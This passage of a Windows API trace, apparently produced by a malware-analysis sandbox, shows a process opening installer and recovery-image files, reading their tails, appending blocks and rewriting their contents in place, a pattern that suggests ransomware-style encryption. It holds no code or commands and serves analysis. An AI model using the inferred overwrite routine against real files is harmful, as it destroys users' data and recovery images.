lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0158.872] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x24000 [0158.872] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.873] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x24000 [0158.873] WriteFile (in: hFile=0x1cc, lpBuffer=0x28956a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.873] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0158.873] WriteFile (in: hFile=0x1cc, lpBuffer=0x2839408*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0158.874] CloseHandle (hObject=0x1cc) returned 1 [0158.874] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.875] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.875] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xbee38 [0158.875] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.875] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.875] ReleaseMutex (hMutex=0x168) returned 1 [0158.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x64.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0158.875] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x64.exe", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VC_redist.x64.exe", lpUsedDefaultChar=0x0) returned 17 [0158.876] ReadFile (in: hFile=0x1cc, lpBuffer=0x2839408, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.440] ReadFile (in: hFile=0x1cc, lpBuffer=0x2839408, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.442] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xbde38 [0159.442] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0159.444] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xbde38 [0159.445] WriteFile (in: hFile=0x1cc, lpBuffer=0x280c608*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x280c608*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0159.446] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0159.446] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0159.447] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0159.447] CloseHandle (hObject=0x1cc) returned 1 [0159.448] CreateFileW (lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\Winre.wim" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\winre.wim"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0159.452] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0159.452] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa160012 [0159.452] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0159.452] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0159.453] ReleaseMutex (hMutex=0x168) returned 1 [0159.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winre.wim", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0159.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Winre.wim", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Winre.wim", lpUsedDefaultChar=0x0) returned 9 [0159.453] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.458] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.461] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.463] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.465] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.467] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef30000 [0159.479] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.712] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x2e9f23c, dwLength=0x1c | out: lpBuffer=0x2e9f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.712] VirtualAlloc (lpAddress=0x0, dwSize=0x70000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eec0000 [0159.723] VirtualFree (lpAddress=0x7ef30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.728] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.731] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.731] VirtualQuery (in: lpAddress=0x7ef30000, lpBuffer=0x2e9f23c, dwLength=0x1c | out: lpBuffer=0x2e9f23c*(BaseAddress=0x7ef30000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0159.732] VirtualAlloc (lpAddress=0x7ef30000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef30000 [0159.733] VirtualAlloc (lpAddress=0x7ef30000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef30000 [0159.736] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.740] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.742] VirtualQuery (in: lpAddress=0x7ef50000, lpBuffer=0x2e9f23c, dwLength=0x1c | out: lpBuffer=0x2e9f23c*(BaseAddress=0x7ef50000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0159.742] VirtualAlloc (lpAddress=0x7ef50000, dwSize=0x30000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef50000 [0159.743] VirtualAlloc (lpAddress=0x7ef50000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef50000 [0159.746] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.972] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.974] ReadFile (in: hFile=0x1cc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0159.975] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x2e9f23c, dwLength=0x1c | out: lpBuffer=0x2e9f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.975] VirtualAlloc (lpAddress=0x0, dwSize=0xf0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7edd0000 [0167.599] VirtualQuery (in: lpAddress=0x7e670000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e670000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0167.599] VirtualAlloc (lpAddress=0x7e670000, dwSize=0x30000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e670000 [0167.605] VirtualAlloc (lpAddress=0x7e670000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e670000 [0167.612] VirtualQuery (in: lpAddress=0x7e6a0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e6a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0167.612] VirtualAlloc (lpAddress=0x7e6a0000, dwSize=0x30000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e6a0000 [0167.613] VirtualAlloc (lpAddress=0x7e6a0000, dwSize=0x30000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e6a0000 [0167.619] VirtualQuery (in: lpAddress=0x7e6d0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e6d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0167.620] VirtualAlloc (lpAddress=0x7e6d0000, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e6d0000 [0167.621] VirtualAlloc (lpAddress=0x7e6d0000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e6d0000 [0167.623] VirtualQuery (in: lpAddress=0x7e6e0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e6e0000, AllocationBase=0x7e6e0000, AllocationProtect=0x4, RegionSize=0x4d0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0167.623] VirtualAlloc (lpAddress=0x0, dwSize=0x140000, flAllocationType=0x101000, flProtect=0x4) returned 0x7e4a0000 [0167.636] VirtualQuery (in: lpAddress=0x7e5e0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e5e0000, AllocationBase=0x7e5e0000, AllocationProtect=0x4, RegionSize=0x90000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.483] VirtualFree (lpAddress=0x7e5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.484] VirtualQuery (in: lpAddress=0x7e670000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e670000, AllocationBase=0x7e670000, AllocationProtect=0x4, RegionSize=0x30000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.484] VirtualFree (lpAddress=0x7e670000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.484] VirtualQuery (in: lpAddress=0x7e6a0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e6a0000, AllocationBase=0x7e6a0000, AllocationProtect=0x4, RegionSize=0x30000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.484] VirtualFree (lpAddress=0x7e6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.485] VirtualQuery (in: lpAddress=0x7e6d0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e6d0000, AllocationBase=0x7e6d0000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.485] VirtualFree (lpAddress=0x7e6d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.500] VirtualQuery (in: lpAddress=0x7e5e0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e5e0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0168.500] VirtualAlloc (lpAddress=0x7e5e0000, dwSize=0x50000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e5e0000 [0168.501] VirtualAlloc (lpAddress=0x7e5e0000, dwSize=0x50000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e5e0000 [0168.531] VirtualQuery (in: lpAddress=0x7e630000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e630000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0168.531] VirtualAlloc (lpAddress=0x7e630000, dwSize=0x70000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e630000 [0168.532] VirtualAlloc (lpAddress=0x7e630000, dwSize=0x70000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e630000 [0168.540] VirtualQuery (in: lpAddress=0x7e6a0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e6a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x40000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0168.540] VirtualAlloc (lpAddress=0x7e6a0000, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e6a0000 [0168.541] VirtualAlloc (lpAddress=0x7e6a0000, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e6a0000 [0168.545] VirtualQuery (in: lpAddress=0x7e6e0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e6e0000, AllocationBase=0x7e6e0000, AllocationProtect=0x4, RegionSize=0x4d0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2d0000, flAllocationType=0x101000, flProtect=0x4) returned 0x7e1d0000 [0169.881] VirtualQuery (in: lpAddress=0x7e4a0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e4a0000, AllocationBase=0x7e4a0000, AllocationProtect=0x4, RegionSize=0x140000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.881] VirtualFree (lpAddress=0x7e4a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.883] VirtualQuery (in: lpAddress=0x7e5e0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e5e0000, AllocationBase=0x7e5e0000, AllocationProtect=0x4, RegionSize=0x50000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.883] VirtualFree (lpAddress=0x7e5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.883] VirtualQuery (in: lpAddress=0x7e630000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e630000, AllocationBase=0x7e630000, AllocationProtect=0x4, RegionSize=0x70000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.883] VirtualFree (lpAddress=0x7e630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.884] VirtualQuery (in: lpAddress=0x7e6a0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e6a0000, AllocationBase=0x7e6a0000, AllocationProtect=0x4, RegionSize=0x40000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.884] VirtualFree (lpAddress=0x7e6a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.894] VirtualQuery (in: lpAddress=0x7e4a0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e4a0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x240000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0169.894] VirtualAlloc (lpAddress=0x7e4a0000, dwSize=0xc0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e4a0000 [0169.895] VirtualAlloc (lpAddress=0x7e4a0000, dwSize=0xc0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e4a0000 [0170.830] VirtualQuery (in: lpAddress=0x7e560000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e560000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x180000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0170.830] VirtualAlloc (lpAddress=0x7e560000, dwSize=0xf0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e560000 [0170.831] VirtualAlloc (lpAddress=0x7e560000, dwSize=0xf0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e560000 [0171.385] VirtualQuery (in: lpAddress=0x7e650000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e650000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0171.385] VirtualAlloc (lpAddress=0x7e650000, dwSize=0x90000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e650000 [0171.386] VirtualAlloc (lpAddress=0x7e650000, dwSize=0x90000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e650000 [0171.397] VirtualQuery (in: lpAddress=0x7e6e0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e6e0000, AllocationBase=0x7e6e0000, AllocationProtect=0x4, RegionSize=0x4d0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.397] VirtualAlloc (lpAddress=0x0, dwSize=0x660000, flAllocationType=0x101000, flProtect=0x4) returned 0x7db70000 [0171.993] VirtualQuery (in: lpAddress=0x7e1d0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e1d0000, AllocationBase=0x7e1d0000, AllocationProtect=0x4, RegionSize=0x2d0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.993] VirtualFree (lpAddress=0x7e1d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.994] VirtualQuery (in: lpAddress=0x7e4a0000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e4a0000, AllocationBase=0x7e4a0000, AllocationProtect=0x4, RegionSize=0xc0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.994] VirtualFree (lpAddress=0x7e4a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.994] VirtualQuery (in: lpAddress=0x7e560000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e560000, AllocationBase=0x7e560000, AllocationProtect=0x4, RegionSize=0xf0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.994] VirtualFree (lpAddress=0x7e560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0171.994] VirtualQuery (in: lpAddress=0x7e650000, lpBuffer=0x2e9f224, dwLength=0x1c | out: lpBuffer=0x2e9f224*(BaseAddress=0x7e650000, AllocationBase=0x7e650000, AllocationProtect=0x4, RegionSize=0x90000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.994] VirtualFree (lpAddress=0x7e650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.412] VirtualQuery (in: lpAddress=0x7e1d0000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e1d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x510000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0172.412] VirtualAlloc (lpAddress=0x7e1d0000, dwSize=0x1a0000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e1d0000 [0172.413] VirtualAlloc (lpAddress=0x7e1d0000, dwSize=0x1a0000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e1d0000 [0172.439] VirtualQuery (in: lpAddress=0x7e370000, lpBuffer=0x2e9f258, dwLength=0x1c | out: lpBuffer=0x2e9f258*(BaseAddress=0x7e370000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x370000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0172.439] VirtualAlloc (lpAddress=0x7e370000, dwSize=0x200000, flAllocationType=0x2000, flProtect=0x4) returned 0x7e370000 [0172.440] VirtualAlloc (lpAddress=0x7e370000, dwSize=0x200000, flAllocationType=0x1000, flProtect=0x4) returned 0x7e370000 [0172.441] VirtualQuery (in: lpAddress=0x7e6e0000, lpBuffer=0x2e9f2b0, dwLength=0x1c | out: lpBuffer=0x2e9f2b0*(BaseAddress=0x7e6e0000, AllocationBase=0x7e6e0000, AllocationProtect=0x4, RegionSize=0x4d0000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.441] VirtualFree (lpAddress=0x7e6e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.442] VirtualQuery (in: lpAddress=0x7ebb0000, lpBuffer=0x2e9f2b0, dwLength=0x1c | out: lpBuffer=0x2e9f2b0*(BaseAddress=0x7ebb0000, AllocationBase=0x7ebb0000, AllocationProtect=0x4, RegionSize=0x140000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.614] VirtualFree (lpAddress=0x7ebb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.615] VirtualQuery (in: lpAddress=0x7ecf0000, lpBuffer=0x2e9f2b0, dwLength=0x1c | out: lpBuffer=0x2e9f2b0*(BaseAddress=0x7ecf0000, AllocationBase=0x7ecf0000, AllocationProtect=0x4, RegionSize=0x190000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.616] VirtualFree (lpAddress=0x7ecf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.619] VirtualQuery (in: lpAddress=0x7ee80000, lpBuffer=0x2e9f2b0, dwLength=0x1c | out: lpBuffer=0x2e9f2b0*(BaseAddress=0x7ee80000, AllocationBase=0x7ee80000, AllocationProtect=0x4, RegionSize=0x100000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0172.619] VirtualFree (lpAddress=0x7ee80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.623] WriteFile (in: hFile=0x1cc, lpBuffer=0x2883b18*, nNumberOfBytesToWrite=0x4588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2883b18*, lpNumberOfBytesWritten=0x2e9f28c*=0x4588, lpOverlapped=0x0) returned 1 [0173.590] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0173.590] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 